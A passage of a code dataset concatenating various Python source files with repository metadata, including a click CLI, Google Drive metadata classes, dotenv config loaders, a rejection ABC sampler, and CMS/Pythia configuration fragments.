] | 1 | 2020-05-19T20:33:00.000Z | 2020-05-20T23:32:50.000Z | sam/entrypoint.py | cssat/sam-iam | 8ad7f67d19fda8b5b9c08e4d3bbb57d429c45fda | [
"MIT"
] | 5 | 2019-06-18T19:11:18.000Z | 2021-03-25T06:25:33.000Z | import click
from .config.cmds import configure
from .iam.cmds import iam
@click.group()
def cli():
    """
    Basic Setup of the Ping 2 Aws Federated Programmatic Access Creation via a manual or automated process.
    """
    # NOTE: the docstring above is rendered as the CLI --help text.
    # Subcommands are attached to this group after the definition.
    pass
# Register the subcommands on the top-level CLI group.
cli.add_command(configure)
cli.add_command(iam)
795c6953575d993b2db6915a20faf673abae0c70 | 3,703 | py | Python | waterbutler/providers/googledrive/metadata.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | waterbutler/providers/googledrive/metadata.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | waterbutler/providers/googledrive/metadata.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | from waterbutler.core import metadata
from waterbutler.providers.googledrive import utils
class BaseGoogleDriveMetadata(metadata.BaseMetadata):
    """Shared behavior for Google Drive file/folder metadata objects."""
    def __init__(self, raw, path):
        # raw: the provider's response dict for this item
        # path: path object for the item (has raw_path; presumably a
        # WaterButlerPath — confirm against callers)
        super().__init__(raw)
        self._path = path
    @property
    def provider(self):
        return 'googledrive'
    @property
    def path(self):
        return '/' + self._path.raw_path
    @property
    def materialized_path(self):
        return str(self._path)
    @property
    def extra(self):
        # Drive's 'version' field doubles as the revision identifier.
        return {'revisionId': self.raw['version']}
class GoogleDriveFolderMetadata(BaseGoogleDriveMetadata, metadata.BaseFolderMetadata):
    """Metadata for a Google Drive folder."""
    def __init__(self, raw, path):
        super().__init__(raw, path)
        # Force the path to be treated as a folder regardless of how it
        # was constructed.
        self._path._is_folder = True
    @property
    def id(self):
        return self.raw['id']
    @property
    def name(self):
        return self.raw['title']
    @property
    def export_name(self):
        return self.name
class GoogleDriveFileMetadata(BaseGoogleDriveMetadata, metadata.BaseFileMetadata):
    """Metadata for a file stored on Google Drive."""
    @property
    def id(self):
        return self.raw['id']
    @property
    def name(self):
        # Google Docs titles carry no extension; append the doc-type
        # extension so the name works as a file name.
        title = self.raw['title']
        if self.is_google_doc:
            ext = utils.get_extension(self.raw)
            title += ext
        return title
    @property
    def size(self):
        # Google docs(Docs,sheets, slides, etc) don't have file size before they are exported
        return self.raw.get('fileSize')
    @property
    def modified(self):
        return self.raw['modifiedDate']
    @property
    def content_type(self):
        return self.raw['mimeType']
    @property
    def etag(self):
        return self.raw['version']
    @property
    def extra(self):
        ret = super().extra
        if self.is_google_doc:
            # Extension used when the doc is exported for download.
            ret['downloadExt'] = utils.get_download_extension(self.raw)
        ret['webView'] = self.raw.get('alternateLink')
        return ret
    @property
    def is_google_doc(self):
        # True for native Google formats (Docs, Sheets, Slides, ...).
        return utils.is_docs_file(self.raw) is not None
    @property
    def export_name(self):
        # Like `name`, but with the *download* (export) extension.
        title = self.raw['title']
        if self.is_google_doc:
            ext = utils.get_download_extension(self.raw)
            title += ext
        return title
class GoogleDriveFileRevisionMetadata(GoogleDriveFileMetadata):
    """Metadata for a specific revision of a Google Drive file.

    Revision payloads differ from file payloads (e.g. 'originalFilename'
    instead of 'title', 'etag' instead of 'version').
    """
    @property
    def id(self):
        return self.raw['id']
    @property
    def name(self):
        # Fall back to the path's name when the revision payload lacks
        # an original file name.
        title = self.raw.get('originalFilename', self._path.name)
        if self.is_google_doc:
            ext = utils.get_extension(self.raw)
            title += ext
        return title
    @property
    def size(self):
        # Google docs(Docs,sheets, slides, etc) don't have file size before they are exported
        return self.raw.get('fileSize')
    @property
    def modified(self):
        return self.raw['modifiedDate']
    @property
    def content_type(self):
        return self.raw['mimeType']
    @property
    def etag(self):
        return self.raw['etag']
    @property
    def extra(self):
        # Google Docs expose their export extension; binary files expose
        # an md5 checksum instead.
        if self.is_google_doc:
            return {'downloadExt': utils.get_download_extension(self.raw)}
        return {'md5': self.raw['md5Checksum']}
    @property
    def export_name(self):
        title = self.raw.get('originalFilename', self._path.name)
        if self.is_google_doc:
            ext = utils.get_download_extension(self.raw)
            title += ext
        return title
class GoogleDriveRevision(metadata.BaseFileRevisionMetadata):
    """A single entry in a Google Drive file's revision list."""
    @property
    def version_identifier(self):
        return 'revision'
    @property
    def version(self):
        return self.raw['id']
    @property
    def modified(self):
        return self.raw['modifiedDate']
| 23.436709 | 94 | 0.622198 |
795c6a899bbe1cf71c1fb301fe494ae122dbbb04 | 1,818 | py | Python | config.py | trandangtien1122/react_flask_temp_1 | 13c45f1e85fc11f5d6e1cc98a7d558d7b346cdd7 | [
"Apache-2.0"
] | 6 | 2020-03-06T13:11:23.000Z | 2021-04-15T05:07:43.000Z | config.py | trandangtien1122/react_flask_temp_1 | 13c45f1e85fc11f5d6e1cc98a7d558d7b346cdd7 | [
"Apache-2.0"
] | 1 | 2021-03-10T14:47:25.000Z | 2021-03-10T14:47:25.000Z | config.py | trandangtien1122/react_flask_temp_1 | 13c45f1e85fc11f5d6e1cc98a7d558d7b346cdd7 | [
"Apache-2.0"
] | 3 | 2021-02-04T02:06:24.000Z | 2021-06-07T18:35:24.000Z | from dotenv import load_dotenv
from pytz import timezone
import os
# Fallback values used when the corresponding environment variable is
# unset (see load_config below).
DEFAULTS = {
    # TODO: remove unused database settings
    "MYSQL_HOST": "localhost",
    "MYSQL_USERNAME": "myuser",
    "MYSQL_PASSWORD": "mypassword",
    "MYSQL_DATABASE": "mydatabase",
    "MONGO_URL": "mongodb://localhost:27017",
    "MONGO_DB": "mydatabase",
    "LOG_FOLDER": "_logs",
    "IS_DEBUG": False,
}
# strftime/strptime formats used across the app
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
DATE_FORMAT = "%Y-%m-%d"
def load_config():
    """Build the configuration dict from the environment.

    Reads a .env file if present, falls back to DEFAULTS for unset
    values, and ensures the log folder exists. Returns the config dict.
    """
    # pull variables from a .env file into the process environment
    load_dotenv()
    env_keys = (
        # TODO: remove unused database
        "MYSQL_HOST", "MYSQL_USERNAME", "MYSQL_PASSWORD", "MYSQL_DATABASE",
        "MONGO_URL", "MONGO_DB", "LOG_FOLDER",
    )
    config = {key: os.getenv(key) for key in env_keys}
    # IS_DEBUG is a flag: enabled only when the variable is exactly "1"
    config["IS_DEBUG"] = os.getenv("IS_DEBUG") == "1"
    # apply defaults for missing config params
    for key, fallback in DEFAULTS.items():
        if config.get(key) is None:
            config[key] = fallback
    # check if log folder exists
    if not os.path.isdir(config["LOG_FOLDER"]):
        os.mkdir(config["LOG_FOLDER"])
    return config
def get_log_folder():
    """Return the configured log folder path."""
    config = load_config()
    return config["LOG_FOLDER"]
def get_mysql_config():
    """Return MySQL settings as (host, database, username, password)."""
    config = load_config()
    return config["MYSQL_HOST"], config["MYSQL_DATABASE"], config["MYSQL_USERNAME"], config["MYSQL_PASSWORD"]
def get_mongodb_config():
    """Return MongoDB settings as (connection URL, database name)."""
    config = load_config()
    return config["MONGO_URL"], config["MONGO_DB"]
def get_timezone():
    """Return the application's pytz timezone."""
    # TODO: replace with your time zone
    return timezone("Australia/Melbourne")
def is_debug():
    """Return True when debug mode is enabled (IS_DEBUG env var == "1")."""
    config = load_config()
    return config["IS_DEBUG"]
| 24.567568 | 109 | 0.643564 |
795c6c075d9007ecc111851fd4504f2bb903b35a | 263 | py | Python | School146/forms/album_form.py | mihdenis85/Synergy | 8811530b7d45a07f9f1be3da9d1a714d5677c1f7 | [
"MIT"
] | null | null | null | School146/forms/album_form.py | mihdenis85/Synergy | 8811530b7d45a07f9f1be3da9d1a714d5677c1f7 | [
"MIT"
] | null | null | null | School146/forms/album_form.py | mihdenis85/Synergy | 8811530b7d45a07f9f1be3da9d1a714d5677c1f7 | [
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
class AlbumForm(FlaskForm):
    """Form with a required album title field and a submit button."""
    # Field labels are user-facing (Russian) strings; left unchanged.
    title = StringField('Название альбома', validators=[DataRequired()])
    submit = SubmitField('Подтвердить')
795c6c4a8279b0f4c33350f3854f79649570c0c2 | 1,042 | py | Python | src/datamigration/azext_dms/vendored_sdks/datamigration/models/name_availability_request.py | rahulgouthamDOTgs/azure-cli-extensions | a1b1198431c25dd88a3f9894712dfc394bba1b19 | [
"MIT"
] | null | null | null | src/datamigration/azext_dms/vendored_sdks/datamigration/models/name_availability_request.py | rahulgouthamDOTgs/azure-cli-extensions | a1b1198431c25dd88a3f9894712dfc394bba1b19 | [
"MIT"
] | null | null | null | src/datamigration/azext_dms/vendored_sdks/datamigration/models/name_availability_request.py | rahulgouthamDOTgs/azure-cli-extensions | a1b1198431c25dd88a3f9894712dfc394bba1b19 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NameAvailabilityRequest(Model):
    """A resource type and proposed name.

    :param name: The proposed resource name
    :type name: str
    :param type: The resource type chain (e.g. virtualMachines/extensions)
    :type type: str
    """
    # Maps attribute names to wire-format keys/types for msrest
    # (de)serialization.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }
    def __init__(self, name=None, type=None):
        super(NameAvailabilityRequest, self).__init__()
        self.name = name
        self.type = type
795c6c5c0d96d0539b9126c4a22a5711199aa564 | 193 | py | Python | config.py | trevorstam/text-similarity | 5a549ef5900ca2522ddfd5ee7accf3358d10ca22 | [
"MIT"
] | null | null | null | config.py | trevorstam/text-similarity | 5a549ef5900ca2522ddfd5ee7accf3358d10ca22 | [
"MIT"
] | null | null | null | config.py | trevorstam/text-similarity | 5a549ef5900ca2522ddfd5ee7accf3358d10ca22 | [
"MIT"
] | null | null | null | import os
from dotenv import load_dotenv
load_dotenv()
PGHOST = os.getenv('PGHOST')
PGDBNAME = os.getenv('PGDBNAME')
PGUSERNAME = os.getenv('PGUSERNAME')
PGPASSWORD = os.getenv('PGPASSWORD')
| 19.3 | 36 | 0.756477 |
795c6c6501ddd6bb44b164a3d035c2f621eb530d | 7,295 | py | Python | _dev/inferences/rejection_abc.py | nicolossus/pylfi | 7950aff5c36e7368cbe77b32ef348966b905f5cf | [
"MIT"
] | null | null | null | _dev/inferences/rejection_abc.py | nicolossus/pylfi | 7950aff5c36e7368cbe77b32ef348966b905f5cf | [
"MIT"
] | null | null | null | _dev/inferences/rejection_abc.py | nicolossus/pylfi | 7950aff5c36e7368cbe77b32ef348966b905f5cf | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import time
import numpy as np
from pylfi.inferences import ABCBase
from pylfi.journal import Journal
from pylfi.utils import setup_logger
from tqdm.auto import tqdm
class RejectionABC(ABCBase):
"""Rejection ABC.
"""
def __init__(self, observation, simulator, priors, distance='l2',
rng=np.random.RandomState, seed=None):
"""
simulator : callable
simulator model
summary_calculator : callable, defualt None
summary statistics calculator. If None, simulator should output
sum stat
distance : str
Can be a custom function or one of l1, l2, mse
distance_metric : callable
discrepancy measure
"""
# self._obs = observation
# self._simulator = simulator # model simulator function
# self._priors = priors
# self._distance = distance # distance metric function
super().__init__(
observation=observation,
simulator=simulator,
priors=priors,
distance=distance,
rng=rng,
seed=seed
)
def __call__(self, num_simulations, epsilon, lra=False):
journal = self.sample(num_simulations, epsilon, lra)
return journal
def sample(self, n_sims=None, n_samples=None, epsilon=0.5, log=True):
"""
add **kwargs for simulator call?
Pritchard et al. (1999) algorithm
n_samples: integer
Number of samples to generate
epsilon : {float, str}
Default 'adaptive'
Notes
-----
Specifying the 'n_simulations' is generally a faster computation than
specifying 'n_samples', but with the trade-off that the number of
posterior samples will be at the mercy of the configuration
lra bool, Whether to run linear regression adjustment as in Beaumont et al. 2002
"""
self._t0 = time.time()
_inference_scheme = "Rejection ABC"
self._log = log
self._epsilon = epsilon
if self._log:
self.logger = setup_logger(self.__class__.__name__)
self.logger.info(f"Initialize {_inference_scheme} sampler.")
if n_sims is None and n_samples is None:
msg = ("One of 'n_sims' or 'n_samples' must be specified.")
raise ValueError(msg)
if n_sims is not None and n_samples is not None:
msg = ("Cannot specify both 'n_sims' and 'n_samples'.")
raise ValueError(msg)
# initialize journal
self._journal = Journal()
self._journal._start_journal(log, self._simulator, self._priors,
_inference_scheme, self._distance, n_sims, epsilon)
if n_sims is not None:
if isinstance(n_sims, int):
# call rejection loop
self._sampler_n_sims(n_sims)
else:
msg = ("The number of simulations must be given as an integer.")
raise TypeError(msg)
if n_samples is not None:
if isinstance(n_samples, int):
# call rejection loop
self._sampler_n_samples(n_samples)
else:
msg = ("The number of samples must be given as an integer.")
raise TypeError(msg)
return self._journal
def _sampler_n_sims(self, n_sims):
"""Sampling loop for specified number of simulations"""
# draw thetas from priors
thetas = np.array([prior.rvs(
size=(n_sims,), rng=self._rng, seed=self._seed) for prior in self._priors])
# run simulator
if self._log:
self.logger.info(f"Run simulator with prior samples.")
sims = []
for i, theta in enumerate(tqdm(np.stack(thetas, axis=-1),
desc="Simulation progress",
position=0,
leave=True,
colour='green')):
sim = self._simulator(*theta)
sims.append(sim)
sims = np.array(sims)
else:
sims = np.array([self._simulator(*thetas)
for thetas in np.stack(thetas, axis=-1)])
# calculate distances
distances = np.array([self._distance(self._obs, sim) for sim in sims])
# acceptance criterion
is_accepted = distances <= self._epsilon
# accepted simulations
n_accepted = is_accepted.sum().item()
thetas_accepted = thetas[:, is_accepted]
dist_accepted = distances[is_accepted]
sims_accepted = sims[is_accepted]
if self._log:
self.logger.info(f"Accepted {n_accepted} of {n_sims} simulations.")
self._journal._processing_msg()
for i, thetas in enumerate(np.stack(thetas_accepted, axis=-1)):
self._journal._add_accepted_parameters(thetas)
self._journal._add_distance(dist_accepted[i])
self._journal._add_rel_distance(sims_accepted[i] - self._obs)
self._journal._add_threshold(self._epsilon)
self._journal._add_sumstats(sims_accepted[i])
'''Rework this'''
# if num_accepted < ... : raise RuntimeError eller custom InferenceError
t1 = time.time() - self._t0
self._journal._process_inference(n_sims, n_accepted, t1)
if self._log:
self._journal._done_msg()
def _sampler_n_samples(self, n_samples):
"""Sampling loop for specified number of posterior samples"""
n_sims = 0
n_accepted = 0
if self._log:
self.logger.info("Run sampler.")
pbar = tqdm(total=n_samples,
desc="Sampling progress",
position=0,
leave=True,
colour='green')
while n_accepted < n_samples:
if self._seed is None:
thetas = [prior.rvs(rng=self._rng) for prior in self._priors]
else:
thetas = [prior.rvs(rng=self._rng, seed=self._seed + n_sims)
for prior in self._priors]
sim = self._simulator(*thetas)
n_sims += 1
distance = self._distance(self._obs, sim)
if distance <= self._epsilon:
if self._log:
pbar.update(1)
n_accepted += 1
self._journal._add_accepted_parameters(thetas)
self._journal._add_distance(distance)
self._journal._add_rel_distance(sim - self._obs)
self._journal._add_threshold(self._epsilon)
self._journal._add_sumstats(sim)
if self._log:
pbar.close()
self.logger.info(f"Sampler ran {n_sims} simulations to "
+ f"obtain {n_accepted} samples.")
self._journal._processing_msg()
t1 = time.time() - self._t0
self._journal._process_inference(n_sims, n_accepted, t1)
if self._log:
self._journal._done_msg()
| 34.904306 | 88 | 0.566141 |
795c6cb6253495756f4dac8b5bf0a659e980d45b | 360 | py | Python | task_scripts/init_db.py | ZettaAI/Synaptor | e425b4c744fca093ee5c63f41b82b3cae7898af4 | [
"MIT"
] | 7 | 2018-04-01T18:18:23.000Z | 2021-09-13T07:02:16.000Z | task_scripts/init_db.py | ZettaAI/Synaptor | e425b4c744fca093ee5c63f41b82b3cae7898af4 | [
"MIT"
] | 5 | 2018-10-24T19:36:03.000Z | 2020-10-30T02:13:38.000Z | task_scripts/init_db.py | ZettaAI/Synaptor | e425b4c744fca093ee5c63f41b82b3cae7898af4 | [
"MIT"
] | 6 | 2018-07-12T17:59:54.000Z | 2020-10-30T02:29:50.000Z | """
Initializes a database with the proper tables, etc.
"""
import synaptor as s
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("storagestr")
args = parser.parse_args()
args.storagestr = s.io.parse_storagestr(args.storagestr)
print(vars(args))
s.proc.io.initdb.drop_db(args.storagestr)
s.proc.io.initdb.init_db(args.storagestr)
| 17.142857 | 56 | 0.769444 |
795c6ed7d3258dd6c904fab685fc42dc89a8bea2 | 7,795 | py | Python | L1Trigger/L1TMuonEndCap/python/simEmtfDigis_cfi.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | L1Trigger/L1TMuonEndCap/python/simEmtfDigis_cfi.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | L1Trigger/L1TMuonEndCap/python/simEmtfDigis_cfi.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
# EMTF emulator configuration
# Check that proper switches are implemented in L1Trigger/Configuration/python/customiseReEmul.py - AWB 02.06.17
###############################################################################################
### IMPORTANT!!! Any changes to this file should be reflected in the 2016, 2017, and 2018 ###
### configurations in configure_by_fw_version in src/SectorProcessor.cc ###
###############################################################################################
simEmtfDigisMC = cms.EDProducer("L1TMuonEndCapTrackProducer",
# Verbosity level
verbosity = cms.untracked.int32(0),
# Configure by firmware version, which may be different than the default parameters in this file
FWConfig = cms.bool(True),
# Input collections
# Three options for CSCInput
# * 'simCscTriggerPrimitiveDigis','MPCSORTED' : simulated trigger primitives (LCTs) from re-emulating CSC digis
# * 'csctfDigis' : real trigger primitives as received by CSCTF (legacy trigger), available only in 2016 data
# * 'emtfStage2Digis' : real trigger primitives as received by EMTF, unpacked in EventFilter/L1TRawToDigi/
CSCInput = cms.InputTag('simCscTriggerPrimitiveDigis','MPCSORTED'),
RPCInput = cms.InputTag('simMuonRPCDigis'),
CPPFInput = cms.InputTag('simCPPFDigis'), ## Cannot use in MC workflow, does not exist yet. CPPFEnable set to False - AWB 01.06.18
GEMInput = cms.InputTag('simMuonGEMPadDigis'),
# Run with CSC, RPC, GEM
CSCEnable = cms.bool(True), # Use CSC LCTs from the MPCs in track-building
RPCEnable = cms.bool(True), # Use clustered RPC hits from CPPF in track-building
CPPFEnable = cms.bool(False), # Use CPPF-emulated clustered RPC hits from CPPF as the RPC hits
GEMEnable = cms.bool(False), # Use hits from GEMs in track-building
# Era (options: 'Run2_2016', 'Run2_2017', 'Run2_2018')
Era = cms.string('Run2_2018'),
# BX
MinBX = cms.int32(-3), # Minimum BX considered
MaxBX = cms.int32(+3), # Maximum BX considered
BXWindow = cms.int32(2), # Number of BX whose primitives can be included in the same track
# CSC LCT BX offset correction
CSCInputBXShift = cms.int32(-8), # Shift applied to input CSC LCT primitives, to center at BX = 0
RPCInputBXShift = cms.int32(0),
GEMInputBXShift = cms.int32(0),
# Sector processor primitive-conversion parameters
spPCParams16 = cms.PSet(
PrimConvLUT = cms.int32(1), # v0 and v1 LUTs used at different times, "-1" for local CPPF files (only works if FWConfig = False)
ZoneBoundaries = cms.vint32(0,41,49,87,127), # Vertical boundaries of track-building zones, in integer theta (5 for 4 zones)
# ZoneBoundaries = cms.vint32(0,36,54,96,127), # New proposed zone boundaries
ZoneOverlap = cms.int32(2), # Overlap between zones
IncludeNeighbor = cms.bool(True), # Include primitives from neighbor chambers in track-building
DuplicateTheta = cms.bool(True), # Use up to 4 theta/phi positions for two LCTs in the same chamber
FixZonePhi = cms.bool(True), # Pattern phi slightly offset from true LCT phi; also ME3/4 pattern width off
UseNewZones = cms.bool(False), # Improve high-quality pattern finding near ring 1-2 gap in ME3/4
FixME11Edges = cms.bool(True), # Improved small fraction of buggy LCT coordinate transformations
),
# Sector processor pattern-recognition parameters
spPRParams16 = cms.PSet(
PatternDefinitions = cms.vstring(
# straightness, hits in ME1, hits in ME2, hits in ME3, hits in ME4
# ME1 vaues centered at 15, range from 0 - 30
# ME2,3,4 values centered at 7, range from 0 - 14
"4,15:15,7:7,7:7,7:7",
"3,16:16,7:7,7:6,7:6",
"3,14:14,7:7,8:7,8:7",
"2,18:17,7:7,7:5,7:5", # should be 7:4 in ME3,4 (FW bug)
"2,13:12,7:7,10:7,10:7",
"1,22:19,7:7,7:0,7:0",
"1,11:8,7:7,14:7,14:7",
"0,30:23,7:7,7:0,7:0",
"0,7:0,7:7,14:7,14:7",
),
SymPatternDefinitions = cms.vstring(
# straightness, hits in ME1, hits in ME2, hits in ME3, hits in ME4
"4,15:15:15:15,7:7:7:7,7:7:7:7,7:7:7:7",
"3,16:16:14:14,7:7:7:7,8:7:7:6,8:7:7:6",
"2,18:17:13:12,7:7:7:7,10:7:7:4,10:7:7:4",
"1,22:19:11:8,7:7:7:7,14:7:7:0,14:7:7:0",
"0,30:23:7:0,7:7:7:7,14:7:7:0,14:7:7:0",
),
UseSymmetricalPatterns = cms.bool(True), # 5 symmetric patterns instead of 9 asymmetric for track building
),
# Sector processor track-building parameters
spTBParams16 = cms.PSet(
ThetaWindow = cms.int32(8), # Maximum dTheta between primitives in the same track
ThetaWindowZone0 = cms.int32(4), # Maximum dTheta between primitives in the same track in Zone 0 (ring 1)
UseSingleHits = cms.bool(False), # Build "tracks" from single LCTs in ME1/1
BugSt2PhDiff = cms.bool(False), # Reduced LCT matching window in station 2, resulting in demoted tracks and inefficiency
BugME11Dupes = cms.bool(False), # LCTs matched to track may take theta value from other LCT in the same chamber
BugAmbigThetaWin = cms.bool(False), # Can allow dThetas outside window when there are 2 LCTs in the same chamber
TwoStationSameBX = cms.bool(True), # Requires the hits in two-station tracks to have the same BX
),
# Sector processor ghost-cancellation parameters
spGCParams16 = cms.PSet(
MaxRoadsPerZone = cms.int32(3), # Number of patterns that can be built per theta zone
MaxTracks = cms.int32(3), # Number of tracks that can be sent from each sector
UseSecondEarliest = cms.bool(True), # Second-earliest LCT used to assign BX, tracks cancel over 3 BX, improved LCT recovery
BugSameSectorPt0 = cms.bool(False), # Only highest-quality track in a sector assigned pT; others assigned pT = 0
),
# Sector processor pt-assignment parameters
spPAParams16 = cms.PSet(
ReadPtLUTFile = cms.bool(False),
FixMode15HighPt = cms.bool(True), # High-pT fix puts outlier LCTs in mode 15 tracks back in a straight line
Bug9BitDPhi = cms.bool(False), # dPhi wrap-around in modes 3, 5, 6, 9, 10, 12
BugMode7CLCT = cms.bool(False), # pT LUT written with incorrect values for mode 7 CLCT, mode 10 random offset
BugNegPt = cms.bool(False), # In all modes negative (1/pT) set to 3 instead of 511
BugGMTPhi = cms.bool(False), # Some drift in uGMT phi conversion, off by up to a few degrees
PromoteMode7 = cms.bool(False), # Assign station 2-3-4 tracks with |eta| > 1.6 SingleMu quality
ModeQualVer = cms.int32(2), # Version 2 contains modified mode-quality mapping for 2018
),
)
simEmtfDigisData = simEmtfDigisMC.clone(
CSCInput = cms.InputTag('emtfStage2Digis'),
RPCInput = cms.InputTag('muonRPCDigis'),
CPPFInput = cms.InputTag('emtfStage2Digis'),
GEMInput = cms.InputTag('muonGEMPadDigis'),
CPPFEnable = cms.bool(True), # Use CPPF-emulated clustered RPC hits from CPPF as the RPC hits
)
simEmtfDigis = simEmtfDigisMC.clone()
## Era: Run2_2016
#from Configuration.Eras.Modifier_stage2L1Trigger_cff import stage2L1Trigger
#stage2L1Trigger.toModify(simEmtfDigis, RPCEnable = cms.bool(False), Era = cms.string('Run2_2016'))
## Era: Run2_2017
#from Configuration.Eras.Modifier_stage2L1Trigger_2017_cff import stage2L1Trigger_2017
#stage2L1Trigger_2017.toModify(simEmtfDigis, RPCEnable = cms.bool(True), Era = cms.string('Run2_2017'))
| 55.678571 | 143 | 0.651058 |
795c717e07d93de4bd6f740c4a6e842cf67accde | 1,805 | py | Python | chatto_transform/datastores/datastore_base.py | chatto-hub-test2/github-permission | dfb364b3663965720ba8b907617a247fec0eff7f | [
"Unlicense",
"MIT"
] | 1 | 2021-07-23T11:52:14.000Z | 2021-07-23T11:52:14.000Z | chatto_transform/datastores/datastore_base.py | chatto-hub-test2/github-permission | dfb364b3663965720ba8b907617a247fec0eff7f | [
"Unlicense",
"MIT"
] | null | null | null | chatto_transform/datastores/datastore_base.py | chatto-hub-test2/github-permission | dfb364b3663965720ba8b907617a247fec0eff7f | [
"Unlicense",
"MIT"
] | null | null | null | class DataStore:
"""Base class - defines the DataStore abstraction.
A DataStore is an adapter between a pandas DataFrame and a storage medium.
Examples of storage media: HDF5 file format, SQL databases backed by SqlAlchemy,
PostgreSQL databases."""
def __init__(self, schema):
self.schema = schema
def storage_target(self):
raise NotImplementedError()
def load(self):
result = self._load()
self.schema.conform_df(result)
return result
def load_chunks(self):
for chunk in self._load_chunks():
self.schema.conform_df(chunk)
yield chunk
del chunk
def store(self, df):
df = df.copy()
self.schema.conform_df(df, storage_target=self.storage_target())
self._store(df)
del df #delete our copy
def store_chunks(self, chunks):
def conform_each(chunks):
for chunk in chunks:
chunk = chunk.copy()
self.schema.conform_df(chunk, storage_target=self.storage_target())
yield chunk
del chunk
self._store_chunks(conform_each(chunks))
def update(self, df):
df = df.copy()
self.schema.conform_df(df, storage_target=self.storage_target())
self._update(df)
del df #delete our copy
def delete(self):
raise NotImplementedError()
def exists(self):
raise NotImplementedError()
def _load(self):
raise NotImplementedError()
def _load_chunks(self):
raise NotImplementedError()
yield
def _store(self, df):
raise NotImplementedError()
def _store_chunks(self, chunk):
raise NotImplementedError()
def _update(self, df):
raise NotImplementedError()
| 27.769231 | 84 | 0.619391 |
795c71a15b9a7238c45e4e8188e5d7c7873e5eba | 2,029 | py | Python | GEN_SIM/Configuration/GenProduction/python/ThirteenTeV/HVDS/HVDS_MZP800_MDP20_Ctau10000mm_Pythia8_13TeV_cff.py | jwill24/Timing | 99c5712eae960646e02bbb796e91b584a9a96132 | [
"MIT"
] | 2 | 2017-10-19T12:28:53.000Z | 2019-05-22T14:36:05.000Z | GEN_SIM/Configuration/GenProduction/python/ThirteenTeV/HVDS/HVDS_MZP800_MDP20_Ctau10000mm_Pythia8_13TeV_cff.py | jwill24/Timing | 99c5712eae960646e02bbb796e91b584a9a96132 | [
"MIT"
] | null | null | null | GEN_SIM/Configuration/GenProduction/python/ThirteenTeV/HVDS/HVDS_MZP800_MDP20_Ctau10000mm_Pythia8_13TeV_cff.py | jwill24/Timing | 99c5712eae960646e02bbb796e91b584a9a96132 | [
"MIT"
] | 6 | 2017-09-13T13:16:10.000Z | 2019-01-28T17:39:51.000Z | import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
comEnergy = cms.double(13000.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
pythiaPylistVerbosity = cms.untracked.int32(1),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'ParticleDecays:limitTau0 = off',
'ParticleDecays:tau0Max = 10000000',
'HiddenValley:ffbar2Zv = on',
'HiddenValley:Ngauge = 3',
'4900023:mWidth = 0.01',
'HiddenValley:pTminFSR = .1',
'HiddenValley:alphaFSR = .8',
'HiddenValley:FSR = on',
'HiddenValley:fragment = on',
'HiddenValley:probVector = 0',
'PartonLevel:MPI = on',
'PartonLevel:ISR = on',
'PartonLevel:FSR = on',
'HadronLevel:Hadronize = on',
'4900023:onMode = off',
'4900023:onIfAny = 4900101',
'4900023:m0 = 800', #Z' mass
'4900101:m0 = .5',
'4900111:m0 = 20', #Dark Pion Mass
'4900111:mayDecay = on',
'4900111:addChannel 1 1. 0 22 22', #force dark pion to decay to diphotons
'4900111:tau0 = 10000', #Dark pion lifetime in mm
'4900211:mayDecay = off',
'-4900211:mayDecay = off'
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters')
)
)
ProductionFilterSequence = cms.Sequence(generator)
| 44.108696 | 93 | 0.514046 |
795c7210576dbcd8988eccca859fd3abe108f5cf | 6,052 | py | Python | packages/python-packages/apistubgentest/apistubgentest/_client.py | chlowell/azure-sdk-tools | c24ecb0fe9ccd75795dd0f3f7bca2f5f9508e644 | [
"MIT"
] | null | null | null | packages/python-packages/apistubgentest/apistubgentest/_client.py | chlowell/azure-sdk-tools | c24ecb0fe9ccd75795dd0f3f7bca2f5f9508e644 | [
"MIT"
] | null | null | null | packages/python-packages/apistubgentest/apistubgentest/_client.py | chlowell/azure-sdk-tools | c24ecb0fe9ccd75795dd0f3f7bca2f5f9508e644 | [
"MIT"
] | null | null | null | from datetime import datetime
from azure.core.paging import ItemPaged
from typing import Optional, Union, List, Any
from .models import FakeObject, FakeError, PetEnumPy3Metaclass
from azure.core import PipelineClient
from typing import Optional, Union
# pylint:disable=docstring-missing-return,docstring-missing-rtype
class DefaultValuesClient:
def with_simple_default(name: str = "Bill", *, age: int = 21) -> None:
pass
def with_simple_optional_defaults(name: Optional[str] = "Bill", *, age: Optional[int] = 21) -> None:
pass
def with_falsy_optional_defaults(*, string: Optional[str] = "", int: Optional[int] = 0, bool: Optional[bool] = False) -> None:
pass
def with_falsy_optional_defaults_and_docstring(*, string: Optional[str] = "", int: Optional[int] = 0, bool: Optional[bool] = False) -> None:
